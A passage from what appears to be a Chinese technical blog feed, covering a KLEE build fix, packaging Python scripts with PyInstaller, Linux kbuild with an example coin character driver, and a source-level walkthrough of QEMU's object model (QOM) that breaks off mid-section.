<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>make[2]: *** No rule to make target '/usr/lib/llvm-3.9/lib/liblibLLVM-3.9.so.so', needed by 'bin/gen-random-bout'. Stop.
</code></pre></div></div>
<p>找不到这个so,一看名字liblibLLVM-3.9.so.so,太怪异了,目测是脚本的问题。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>test@ubuntu:~/klee_build_dir$ cd /usr/lib/llvm-3.9/lib
test@ubuntu:/usr/lib/llvm-3.9/lib$ ls
libLLVM-3.9.1.so libLLVMX86AsmParser.a
libLLVM-3.9.1.so.1 libLLVMX86AsmPrinter.a
libLLVM-3.9.so libLLVMX86CodeGen.a
libLLVM-3.9.so.1 libLLVMX86Desc.a
</code></pre></div></div>
<p>简单的解决办法:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ ln -l libLLVM-3.9.so liblibLLVM-3.9.so.so
</code></pre></div></div>
<p>这样就把KLEE的环境搞好了,可以安装Tutorial搞起来了。</p>
Python打包成exe2017-05-18T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2017/05/18/python-to-exe
<p>这篇文章非常简单,主要做一下记录,以后方便查询。</p>
<p>Python简单易用经常被用来开发脚本。但是为了在其他地方运行,可能不仅需要安装Python解释器,
还得安装一些依赖库。这篇文章介绍一下使用pyinstaller打包exe的过程。
使用如下例子:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#test.py
import sys
def main():
print "Hello world"
print sys.argv[0]
if '__main__' == __name__:
main()
</code></pre></div></div>
<p>首先安装pyinstaller:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pip install pyinstaller
</code></pre></div></div>
<p>按照<a href="http://www.pyinstaller.org/">官网</a>的说法,这个时候在Python的目录下使用</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pyinstaller test.py
</code></pre></div></div>
<p>就能够生产exe,虽然确实是在dist/test目录下面生成了exe,但是如果放到其他地方,会有错误:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Error loading Python DLL: E:\study\python27.dll (error code 126)
</code></pre></div></div>
<p>可以使用如下命令解决:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>D:\Python27>pyinstaller --clean --win-private-assemblies -F test.py
</code></pre></div></div>
<p>这样在dist会生产exe,并且把需要的Python和相关的包全部打包,即可随意放到一个环境运行。</p>
Linux内核编译系统kbuild简介2017-03-29T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2017/03/29/kbuild-introduction
<ul>
<li><a href="#第一节">前言</a></li>
<li><a href="#第二节">kbuild四个部分</a></li>
<li><a href="#第三节">实例</a></li>
</ul>
<h2 id="第一节"> 前言 </h2>
<p>这篇文章并非原创,是偶然在linuxjournal上面看到的一篇<a href="http://www.linuxjournal.com/content/kbuild-linux-kernel-build-system?page=0,0">文章</a>,感觉写得比较清晰,例子详尽,所以这里对文章进行简单整理,算是一个笔记。本文主要是关于kbuild的简单介绍,不会介绍linux内核的具体编译过程,以后机会单独写一篇。</p>
<p>Linux内核有一个神奇的地方,既可以用在大型集群上面,也可以用在小巧的嵌入式设备上。使用Linux的设备不论大小,都有一个共同的代码基,你看苹果就不行,OSX和iOS就是分开的。主要原因有两点,Linux有一个非常好的抽象层,以及构建系统允许有非常大的定制自由度。</p>
<p>Linux是一个mono类型的内核,所有的内核代码都位于内核空间。但是Linux也能够加载内核模块,在内核运行期间可以增加内核代码。所以在内核编译的时候就需要决定哪些东西需要编译进内核,哪些需要编译成模块。这就需要一个系统来管理了,这就是kbuild。</p>
<h2 id="第二节"> kbuild的四个部分 </h2>
<p>kbuild主要包括如下四个部分:</p>
<ul>
<li><b>Config symbols</b>:编译选项,用来决定代码的条件编译以及决定哪些编译进内核,哪些编译成模块。</li>
<li><b>Kconfig files</b>:定义每一个config symbol的属性,比如其类型,描述和依赖等。程序需要使用Kconfig file生成一个菜单,比如make menuconfig生成的数据就是读取这个文件来生成的。</li>
<li><b>.config file</b>:存储每一个config symbol选择的值。可以手动修改或者使用make工具生成。</li>
<li><b>Makefiles</b>:这个就是普通的make工具了,用于指导源文件生成目标文件的过程,内核啊,内核模块啊。</li>
</ul>
<p>下面对这四个部分进行详细介绍。</p>
<h3><b> Configuration Symbols </b></h3>
<p>Configuration Symbols用来决定哪些特性或者模块将会被编译进内核。最常见的是两种编译选项,boolean和tristate,其不同之处只是可以取的值不同。boolean symbols可以取两种值:true/false,就是开关。tristate可以取三种值,yes/no/module。</p>
<p>内核中的很多选项都需要一个开关,而不是module,比如对SMP或者preemption的支持,必须要在内核编译时候就决定好,这个时候就用boolean config symbol就行了。很多设备驱动可以在之后加入内核,这个时候使用tristate config symbol,决定是编译进内核呢,还是模块,还是压根就不编译。</p>
<p>其他config symbol包括strings和hex,但是这些不常用,此处从略。</p>
<h3><b> Kconfig Files </b></h3>
<p>Configuration symbols是定义在Kconfig file中的,每一个Kconfig file可以描述任意数量的symbols,也可以使用include包含其他Kconfig file。内核编译工具如,make menuconfig读取这些文件生成一个树形结构。内核中的每一个目录都有一个Kconfig,并且它们包含自己子目录的Kconfig file,内核根目录树下面有一个Kconfig。menuconfig/gconfig就从根目录下的Kconfig开始,递归读取。</p>
<p>下面是arc/x86下的Kconfig节选:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># Select 32 or 64 bit
config 64BIT
bool "64-bit kernel" if ARCH = "x86"
default ARCH != "i386"
---help---
Say yes to build a 64-bit kernel - formerly known as x86_64
Say no to build a 32-bit kernel - formerly known as i386
config X86_32
def_bool y
depends on !64BIT
# Options that are inherently 32-bit kernel only:
select ARCH_WANT_IPC_PARSE_VERSION
select CLKSRC_I8253
select CLONE_BACKWARDS
select HAVE_AOUT
select HAVE_GENERIC_DMA_COHERENT
select MODULES_USE_ELF_REL
select OLD_SIGACTION
</code></pre></div></div>
<h3><b> .config file </b></h3>
<p>所有的config symbol值都保存在.config文件中,每一次执行meuconfig都会讲变化写入该文件。.config是一个文本文件,所以可以直接手动修改。.config每一行都会表示一个config symbol的值,如果没有选就会注释掉。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>CONFIG_KVM_AMD=m
# CONFIG_KVM_MMU_AUDIT is not set
CONFIG_KVM_DEVICE_ASSIGNMENT=y
CONFIG_VHOST_NET=m
</code></pre></div></div>
<h3><b> Makefiles </b></h3>
<p>Makefiles用来编译内核和模块,与Kconfig类似,每一个子目录都会有一个Makefile文件,
用来编译其下的文件。整个编译过程也是递归的,上一层的Makefile下降到子目录中,
然后编译。</p>
<h2 id="第三节"> 实例 </h2>
<p>本节中实现一个coin driver,把上面的东西实践一下。coin driver是一个char类型的driver,每次读随机返回正反面(tail/head),并且有一个统计次数的可选项。</p>
<p>比如:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>test@ubuntu:~$ sudo cat /dev/coin
tail
test@ubuntu:~$ sudo cat /dev/coin
head
test@ubuntu:~$ sudo cat /dev/coin
head
test@ubuntu:~$ sudo cat /dev/coin
head
test@ubuntu:~$ sudo cat /dev/coin
head
test@ubuntu:~$ sudo cat /sys/kernel/debug/coin/stats
head=14 tail=12
test@ubuntu:~$
</code></pre></div></div>
<p>给内核增加一个模块,需要做三件事:</p>
<ol>
<li>把源文件放在相应的目录,比如对于wifi设备驱动就应该放在drivers/net/wireless</li>
<li>更新文件所在目录的Kconfig</li>
<li>更新文件所在的Makefile</li>
</ol>
<p>在我们的例子中,coin是一个字符设备,所以coin.c可以放在drivers/char。</p>
<p>coin可以编译到内核中,也可以编译成模块,所以COIN这个config symbol应该是一个tristate(y/n/m),COIN_STAT这个config symbol用于决定是否显示统计信息,很明显,COIN_STAT依赖于COIN,如果不定义COIN,定义COIN_STAT并没有意义。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$make menuconfig
</code></pre></div></div>
<p>我们选择将COIN为m,COIN_STAT为y。之后在.config之中,会加上一个CONFIG_前缀。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>CONFIG_COIN=m
CONFIG_COIN_STAT=y
#define CONFIG_COIN_MODULE 1
#define CONFIG_COIN_STAT 1
</code></pre></div></div>
<p>当编译的时候,会执行脚本读取Kconfig</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ scripts/kconfig/conf Kconfig
</code></pre></div></div>
<p>生成一个头文件include/generated/autoconf.h,其中可以看到</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define CONFIG_COIN_MODULE 1
#define CONFIG_COIN_STAT 1
</code></pre></div></div>
<p>如果将COIN定义为y,则会有如下定义</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define CONFIG_COIN 1
</code></pre></div></div>
<p>为了生成.ko,我们还需要再drivers/char/Makefile中添加如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>obj-$(CONFIG_COIN) += coin.o
</code></pre></div></div>
<p>由于CONFIG_COIN不是y就是m,所以coin.o会被添加到obj-y或者obj-m链表中。
这样例子就完成了。kbuild编译流程可以简单如下图所示。文末附上驱动代码,来自原文。</p>
<p><img src="/assets/img/kbuild/1.jpg" alt="" /></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/fs.h>
#include <linux/uaccess.h>
#include <linux/device.h>
#include <linux/random.h>
#include <linux/debugfs.h>
#define DEVNAME "coin"
#define LEN 20
enum values {HEAD, TAIL};
struct dentry *dir, *file;
int file_value;
int stats[2] = {0, 0};
char *msg[2] = {"head\n", "tail\n"};
static int major;
static struct class *class_coin;
static struct device *dev_coin;
static ssize_t r_coin(struct file *f, char __user *b,
size_t cnt, loff_t *lf)
{
char *ret;
u32 value = prandom_u32() % 2;
ret = msg[value];
stats[value]++;
return simple_read_from_buffer(b, cnt,
lf, ret,
strlen(ret));
}
static struct file_operations fops = { .read = r_coin };
#ifdef CONFIG_COIN_STAT
static ssize_t r_stat(struct file *f, char __user *b,
size_t cnt, loff_t *lf)
{
char buf[LEN];
snprintf(buf, LEN, "head=%d tail=%d\n",
stats[HEAD], stats[TAIL]);
return simple_read_from_buffer(b, cnt,
lf, buf,
strlen(buf));
}
static struct file_operations fstat = { .read = r_stat };
#endif
int init_module(void)
{
void *ptr_err;
major = register_chrdev(0, DEVNAME, &fops);
if (major < 0)
return major;
class_coin = class_create(THIS_MODULE,
DEVNAME);
if (IS_ERR(class_coin)) {
ptr_err = class_coin;
goto err_class;
}
dev_coin = device_create(class_coin, NULL,
MKDEV(major, 0),
NULL, DEVNAME);
if (IS_ERR(dev_coin))
goto err_dev;
#ifdef CONFIG_COIN_STAT
dir = debugfs_create_dir("coin", NULL);
file = debugfs_create_file("stats", 0644,
dir, &file_value,
&fstat);
#endif
return 0;
err_dev:
ptr_err = class_coin;
class_destroy(class_coin);
err_class:
unregister_chrdev(major, DEVNAME);
return PTR_ERR(ptr_err);
}
void cleanup_module(void)
{
#ifdef CONFIG_COIN_STAT
debugfs_remove(file);
debugfs_remove(dir);
#endif
device_destroy(class_coin, MKDEV(major, 0));
class_destroy(class_coin);
return unregister_chrdev(major, DEVNAME);
}
MODULE_LICENSE("GPL");
</code></pre></div></div>
QOM介绍2017-01-08T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2017/01/08/qom-introduction
<ul>
<li><a href="#第一节">一. 模块注册</a></li>
<li><a href="#第二节">二. Class的初始化</a></li>
<li><a href="#第三节">三. Class的层次结构</a></li>
<li><a href="#第四节">四. 对象的构造</a></li>
<li><a href="#总结">五. 总结</a></li>
<li><a href="#后记">后记</a></li>
</ul>
<p>QOM全称qemu object model,顾名思义,这是对qemu中对象的一个抽象层。通过QOM可以对qemu中的各种资源进行抽象、管理。比如设备模拟中的设备创建,配置,销毁。QOM还用于各种backend的抽象,MemoryRegion,Machine等的抽象,毫不夸张的说,QOM遍布于qemu代码。本文以qemu的设备模拟为例,对QOM进行详细介绍。本文代码基于qemu-2.8。</p>
<h2 id="第一节"> 一. 模块注册 </h2>
<p>在hw文件目录下的设备模拟中,几乎所有.c文件都会有一个全局的</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>type_init(xxxxxxxxx)
</code></pre></div></div>
<p>。这就是向QOM模块注册自己,比如</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>type_init(serial_register_types)//注册serial
type_init(vmxnet3_register_types)//注册vmxnet3
</code></pre></div></div>
<p>这类似于Linux驱动模块的注册,在这里type_init是一个宏,在include/qemu/module.h中,我们看到</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define module_init(function, type) \
static void __attribute__((constructor)) do_qemu_init_ ## function(void) \
{ \
register_module_init(function, type); \
}
typedef enum {
MODULE_INIT_BLOCK,
MODULE_INIT_OPTS,
MODULE_INIT_QAPI,
MODULE_INIT_QOM,
MODULE_INIT_TRACE,
MODULE_INIT_MAX
} module_init_type;
#define block_init(function) module_init(function, MODULE_INIT_BLOCK)
#define opts_init(function) module_init(function, MODULE_INIT_OPTS)
#define qapi_init(function) module_init(function, MODULE_INIT_QAPI)
#define type_init(function) module_init(function, MODULE_INIT_QOM)
#define trace_init(function) module_init(function, MODULE_INIT_TRACE)
</code></pre></div></div>
<p>这里有多个module,对于xxx_init,都是通过调用module_init来进行注册的。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void register_module_init(void (*fn)(void), module_init_type type)
{
ModuleEntry *e;
ModuleTypeList *l;
e = g_malloc0(sizeof(*e));
e->init = fn;
e->type = type;
l = find_type(type);
QTAILQ_INSERT_TAIL(l, e, node);
}
static ModuleTypeList *find_type(module_init_type type)
{
init_lists();
return &init_type_list[type];
}
static ModuleTypeList init_type_list[MODULE_INIT_MAX];
</code></pre></div></div>
<p>这样一看就比较清楚了,init_type_list作为全局的list数组,所有通过type_init注册的对象就会被放连接在init_type_list[MODULE_INIT_QOM]这个list上。这个过程可以用如下图表示。</p>
<p><img src="/assets/img/qom/1.png" alt="" /></p>
<p>我们注意到module_init的定义</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define module_init(function, type) \
static void __attribute__((constructor)) do_qemu_init_ ## function(void) \
{ \
register_module_init(function, type); \
}
</code></pre></div></div>
<p>所以每一个type_init都会是一个函数do_qemu_init_xxxx,比如type_init(serial_register_types)将会被展开成</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>staic void __attribute__((constructor)) do_qemu_init_serial_register_types()
{
register_module_init(serial_register_types, MODULE_INIT_QOM)
}
</code></pre></div></div>
<p>从constructor属性看,这将会使得该函数在main之前执行。</p>
<p>所以在qemu的main函数执行之前,图1中的各种链表已经准备好了。
在main函数中,我们可以看到,很快就调用了</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>module_call_init(MODULE_INIT_QOM);
</code></pre></div></div>
<p>看module_call_init定义,</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void module_call_init(module_init_type type)
{
ModuleTypeList *l;
ModuleEntry *e;
l = find_type(type);
QTAILQ_FOREACH(e, l, node) {
e->init();
}
}
</code></pre></div></div>
<p>可以看到该函数就是简单调用了注册在其上面的init函数,以serial举例:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void serial_register_types(void)
{
type_register_static(&serial_isa_info);
}
type_init(serial_register_types)
</code></pre></div></div>
<p>这里就是调用会调用serial_register_types,这个函数以serial_isa_info为参数调用了type_register_static。
函数调用链如下</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>type_register_static->type_register->type_register_internal->type_new
</code></pre></div></div>
<p>这一过程的目的就是利用TypeInfo构造出一个TypeImpl结构,之后插入到一个hash表之中,这个hash表以ti->name,也就是info->name为key,value就是生根据TypeInfo生成的TypeImpl。这样在,module_call_init(MODULE_INIT_QOM)调用之后,就有了一个type的哈希表,这里面保存了所有的类型信息。</p>
<h2 id="第二节">二. Class的初始化 </h2>
<p>从第一部分我们已经知道,现在已经有了一个TypeImpl的哈希表。下一步就是初始化每个type了,这一步可以看成是class的初始化,可以理解成每一个type对应了一个class,接下来会初始化class。调用链</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>main->select_machine->find_default_machine->object_class_get_list->object_class_foreach
</code></pre></div></div>
<p>这里实在选择机器类型的时候顺便把各个type给初始化了。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void object_class_foreach(void (*fn)(ObjectClass *klass, void *opaque),
const char *implements_type, bool include_abstract,
void *opaque)
{
OCFData data = { fn, implements_type, include_abstract, opaque };
enumerating_types = true;
g_hash_table_foreach(type_table_get(), object_class_foreach_tramp, &data);
enumerating_types = false;
}
</code></pre></div></div>
<p>type_table_get就是之前创建的name为key,TypeImpl为value的哈希表。看看对这个表中的每一项调用的函数。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void object_class_foreach_tramp(gpointer key, gpointer value,
gpointer opaque)
{
OCFData *data = opaque;
TypeImpl *type = value;
ObjectClass *k;
type_initialize(type);
k = type->class;
if (!data->include_abstract && type->abstract) {
return;
}
if (data->implements_type &&
!object_class_dynamic_cast(k, data->implements_type)) {
return;
}
data->fn(k, data->opaque);
}
</code></pre></div></div>
<p>我们来看 type_initialize函数</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void type_initialize(TypeImpl *ti)
{
TypeImpl *parent;
if (ti->class) {
return;
}
ti->class_size = type_class_get_size(ti);
ti->instance_size = type_object_get_size(ti);
ti->class = g_malloc0(ti->class_size);
parent = type_get_parent(ti);
if (parent) {
type_initialize(parent);
GSList *e;
int i;
g_assert_cmpint(parent->class_size, <=, ti->class_size);
memcpy(ti->class, parent->class, parent->class_size);
ti->class->interfaces = NULL;
ti->class->properties = g_hash_table_new_full(
g_str_hash, g_str_equal, g_free, object_property_free);
for (e = parent->class->interfaces; e; e = e->next) {
InterfaceClass *iface = e->data;
ObjectClass *klass = OBJECT_CLASS(iface);
type_initialize_interface(ti, iface->interface_type, klass->type);
}
for (i = 0; i < ti->num_interfaces; i++) {
TypeImpl *t = type_get_by_name(ti->interfaces[i].typename);
for (e = ti->class->interfaces; e; e = e->next) {
TypeImpl *target_type = OBJECT_CLASS(e->data)->type;
if (type_is_ancestor(target_type, t)) {
break;
}
}
if (e) {
continue;
}
type_initialize_interface(ti, t, t);
}
} else {
ti->class->properties = g_hash_table_new_full(
g_str_hash, g_str_equal, g_free, object_property_free);
}
ti->class->type = ti;
while (parent) {
if (parent->class_base_init) {
parent->class_base_init(ti->class, ti->class_data);
}
parent = type_get_parent(parent);
}
if (ti->class_init) {
ti->class_init(ti->class, ti->class_data);
}
}
</code></pre></div></div>
<p>开头我们可以看到,如果ti->class已经存在说明已经初始化了,直接返回,再看,如果有parent,会递归调用type_initialize,即调用父对象的初始化函数。</p>
<p>这里我们看到type也有一个层次关系,即QOM 对象的层次结构。在serial_isa_info
结构的定义中,我们可以看到有一个.parent域,</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static const TypeInfo serial_isa_info = {
.name = TYPE_ISA_SERIAL,
.parent = TYPE_ISA_DEVICE,
.instance_size = sizeof(ISASerialState),
.class_init = serial_isa_class_initfn,
};
</code></pre></div></div>
<p>这说明TYPE_ISA_SERIAL的父type是TYPE_ISA_DEVICE,在hw/isa/isa-bus.c中可以看到isa_device_type_info的父type是TYPE_DEVICE</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static const TypeInfo isa_device_type_info = {
.name = TYPE_ISA_DEVICE,
.parent = TYPE_DEVICE,
.instance_size = sizeof(ISADevice),
.instance_init = isa_device_init,
.abstract = true,
.class_size = sizeof(ISADeviceClass),
.class_init = isa_device_class_init,
};
</code></pre></div></div>
<p>依次往上溯我们可以得到这样一条type的链,</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>TYPE_ISA_SERIAL->TYPE_ISA_DEVICE->TYPE_DEVICE->TYPE_OBJECT
</code></pre></div></div>
<p>事实上,qemu中有两种根type,还有一种是TYPE_INTERFACE。</p>
<p>这样我们看到其实就跟各个type初始化的顺序没有关系了。不管哪个type最先初始化,最终都会初始化到object的type。对于object,只是简单的设置了一下分配了ti->class,设置了ti->class->type的值。如果type有interface,还需要初始化ti->class->interfaces的值,每一个interface也是一个type。如果父type有interfaces,还需要将父type的interface添加到ti->class->interfaces上去。</p>
<p>之后,最重要的就是调用parent->class_base_init以及ti->class_init了,这相当于C++里面的构造基类的数据。我们以一个class_init为例,</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void serial_isa_class_initfn(ObjectClass *klass, void *data)
{
DeviceClass *dc = DEVICE_CLASS(klass);
dc->realize = serial_isa_realizefn;
dc->vmsd = &vmstate_isa_serial;
dc->props = serial_isa_properties;
set_bit(DEVICE_CATEGORY_INPUT, dc->categories);
}
</code></pre></div></div>
<p>我们可以看到这里从ObjectClass转换成了DeviceClass,然后做了一些簿记工作。这里为什么可以做转换呢。接下来看看Class的层次结构。</p>
<h2 id="第三节">三. Class的层次结构 </h2>
<p>vmxnnet3的层次多一些,我们以他为例,首先看vmxnet3_info的定义。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static const TypeInfo vmxnet3_info = {
.name = TYPE_VMXNET3,
.parent = TYPE_PCI_DEVICE,
.class_size = sizeof(VMXNET3Class),
.instance_size = sizeof(VMXNET3State),
.class_init = vmxnet3_class_init,
.instance_init = vmxnet3_instance_init,
};
typedef struct VMXNET3Class {
PCIDeviceClass parent_class;
DeviceRealize parent_dc_realize;
} VMXNET3Class;
typedef struct PCIDeviceClass {
DeviceClass parent_class;
void (*realize)(PCIDevice *dev, Error **errp);
int (*init)(PCIDevice *dev);/* TODO convert to realize() and remove */
PCIUnregisterFunc *exit;
PCIConfigReadFunc *config_read;
PCIConfigWriteFunc *config_write;
...
} PCIDeviceClass;
typedef struct DeviceClass {
/*< private >*/
ObjectClass parent_class;
/*< public >*/
...
} DeviceClass;
struct ObjectClass
{
/*< private >*/
Type type;
GSList *interfaces;
const char *object_cast_cache[OBJECT_CLASS_CAST_CACHE];
const char *class_cast_cache[OBJECT_CLASS_CAST_CACHE];
ObjectUnparent *unparent;
GHashTable *properties;
};
</code></pre></div></div>
<p>我们可以看到这样一种层次结构</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>VMXNET3Class->PCIDeviceClass->DeviceClass->ObjectClass
</code></pre></div></div>
<p>这可以看成C++中的继承关系,即当然基类就是ObjectClass,越往下包含的数据越具象。</p>
<p>从type_initialize中,我们可以看到,调用class_init(ti->class,ti->class_data)
,这里的ti->class就是刚刚分配出来的,对应到vmxnet3,这里就是一个VMXNET3Class结构,
注意到</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>memcpy(ti->class, parent->class, parent->class_size);
</code></pre></div></div>
<p>所以VMXNET3Class的各个父Class已经被初始化了。所以当进入vmxnet3_class_init之后,调用DEVICE_CLASS和PCI_DEVICE_CLASS以及VMXNET3_DEVICE_CLASS可以分别得到其基Class,类似于C++里面的派生类转换到基类。以</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PCIDeviceClass *c = PCI_DEVICE_CLASS(class);
</code></pre></div></div>
<p>这句为例,我们知道这里class是vmxnet3对应的class,即class->type->name=”vmxnet3”。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define PCI_DEVICE_CLASS(klass) \
OBJECT_CLASS_CHECK(PCIDeviceClass, (klass), TYPE_PCI_DEVICE)
#define OBJECT_CLASS_CHECK(class_type, class, name) \
((class_type *)object_class_dynamic_cast_assert(OBJECT_CLASS(class), (name), \
__FILE__, __LINE__, __func__))
ObjectClass *object_class_dynamic_cast_assert(ObjectClass *class,
const char *typename,
const char *file, int line,
const char *func)
{
ObjectClass *ret;
...
ret = object_class_dynamic_cast(class, typename);
...
return ret;
}
ObjectClass *object_class_dynamic_cast(ObjectClass *class,
const char *typename)
{
ObjectClass *ret = NULL;
TypeImpl *target_type;
TypeImpl *type;
if (!class) {
return NULL;
}
/* A simple fast path that can trigger a lot for leaf classes. */
type = class->type;
if (type->name == typename) {
return class;
}
target_type = type_get_by_name(typename);
if (!target_type) {
/* target class type unknown, so fail the cast */
return NULL;
}
if (type->class->interfaces &&
...
} else if (type_is_ancestor(type, target_type)) {
ret = class;
}
return ret;
}
static bool type_is_ancestor(TypeImpl *type, TypeImpl *target_type)
{
assert(target_type);
/* Check if target_type is a direct ancestor of type */
while (type) {
if (type == target_type) {
return true;
}
type = type_get_parent(type);
}
return false;
}
</code></pre></div></div>
<p>最终会进入object_class_dynamic_cast函数,在该函数中,根据class对应的type以及typename对应的type,判断是否能够转换,判断的主要依据就是type_is_ancestor,
这个判断target_type是否是type的一个祖先,如果是当然可以进行转换,否则就不行。</p>
<p>好了,总结一下,现在我们得到了什么,从最开始得TypeImpl初始化了每一个type对应的class,并且构建好了各个Class的继承关系。如下图所示,注意下面的***Class都包含了上面的一部分。</p>
<p><img src="/assets/img/qom/2.png" alt="" /></p>
<h2 id="第四节">四. 对象的构造</h2>
<p>我们上面已经看到了type哈希表的构造以及class的初始化,接下来讨论具体设备的创建。</p>
<p>以vmxnet3为例,我们需要再命令行指定-device vmxnet3。在main中,有这么一句话</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>if (qemu_opts_foreach(qemu_find_opts("device"),
device_init_func, NULL, NULL)) {
exit(1);
}
</code></pre></div></div>
<p>对参数中的device调用device_init_func函数,调用链</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>device_init_func->qdev_device_add
</code></pre></div></div>
<p>在qdev_device_add中我们可以看到这么一句话</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> dev = DEVICE(object_new(driver));
DeviceState *qdev_device_add(QemuOpts *opts, Error **errp)
{
DeviceClass *dc;
const char *driver, *path;
DeviceState *dev;
BusState *bus = NULL;
Error *err = NULL;
driver = qemu_opt_get(opts, "driver");
if (!driver) {
error_setg(errp, QERR_MISSING_PARAMETER, "driver");
return NULL;
}
/* find driver */
dc = qdev_get_device_class(&driver, errp);
if (!dc) {
return NULL;
}
/* find bus */
path = qemu_opt_get(opts, "bus");
if (path != NULL) {
bus = qbus_find(path, errp);
if (!bus) {
return NULL;
}
if (!object_dynamic_cast(OBJECT(bus), dc->bus_type)) {
error_setg(errp, "Device '%s' can't go on %s bus",
driver, object_get_typename(OBJECT(bus)));
return NULL;
}
} else if (dc->bus_type != NULL) {
bus = qbus_find_recursive(sysbus_get_default(), NULL, dc->bus_type);
if (!bus || qbus_is_full(bus)) {
error_setg(errp, "No '%s' bus found for device '%s'",
dc->bus_type, driver);
return NULL;
}
}
if (qdev_hotplug && bus && !qbus_is_hotpluggable(bus)) {
error_setg(errp, QERR_BUS_NO_HOTPLUG, bus->name);
return NULL;
}
/* create device */
dev = DEVICE(object_new(driver));
if (bus) {
qdev_set_parent_bus(dev, bus);
}
qdev_set_id(dev, qemu_opts_id(opts));
/* set properties */
if (qemu_opt_foreach(opts, set_property, dev, &err)) {
error_propagate(errp, err);
object_unparent(OBJECT(dev));
object_unref(OBJECT(dev));
return NULL;
}
dev->opts = opts;
object_property_set_bool(OBJECT(dev), true, "realized", &err);
if (err != NULL) {
error_propagate(errp, err);
dev->opts = NULL;
object_unparent(OBJECT(dev));
object_unref(OBJECT(dev));
return NULL;
}
return dev;
}
</code></pre></div></div>
<p>对象的调用是通过object_new(driver)实现的,这里的driver就是设备名,vmxnet3,</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>object_new->object_new_with_type->object_initialize_with_type
Object *object_new_with_type(Type type)
{
Object *obj;
g_assert(type != NULL);
type_initialize(type);
obj = g_malloc(type->instance_size);
object_initialize_with_type(obj, type->instance_size, type);
obj->free = g_free;
return obj;
}
static void object_init_with_type(Object *obj, TypeImpl *ti)
{
if (type_has_parent(ti)) {
object_init_with_type(obj, type_get_parent(ti));
}
if (ti->instance_init) {
ti->instance_init(obj);
}
}
</code></pre></div></div>
<p>从上面函数看,也会递归初始化每一个object的父object,之后调用instance_init函数。这里又涉及到了object的继承。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>typedef struct {
PCIDevice parent_obj;
...
} VMXNET3State;
struct PCIDevice {
DeviceState qdev;
...
};
struct DeviceState {
/*< private >*/
Object parent_obj;
/*< public >*/
};
struct Object
{
/*< private >*/
ObjectClass *class;
ObjectFree *free;
GHashTable *properties;
uint32_t ref;
Object *parent;
};
</code></pre></div></div>
<p>这次的继承体系是</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>VMXNET3State->PCIDevice->DeviceState->Object
</code></pre></div></div>
<p>这样就创建好了一个DeviceState,当然其实也是VMXNET3State,并且每一个父object的instance_init函数都已经调用好了,这里我们看看object、deviceobject、pcideviceobject的init函数都干了啥</p>
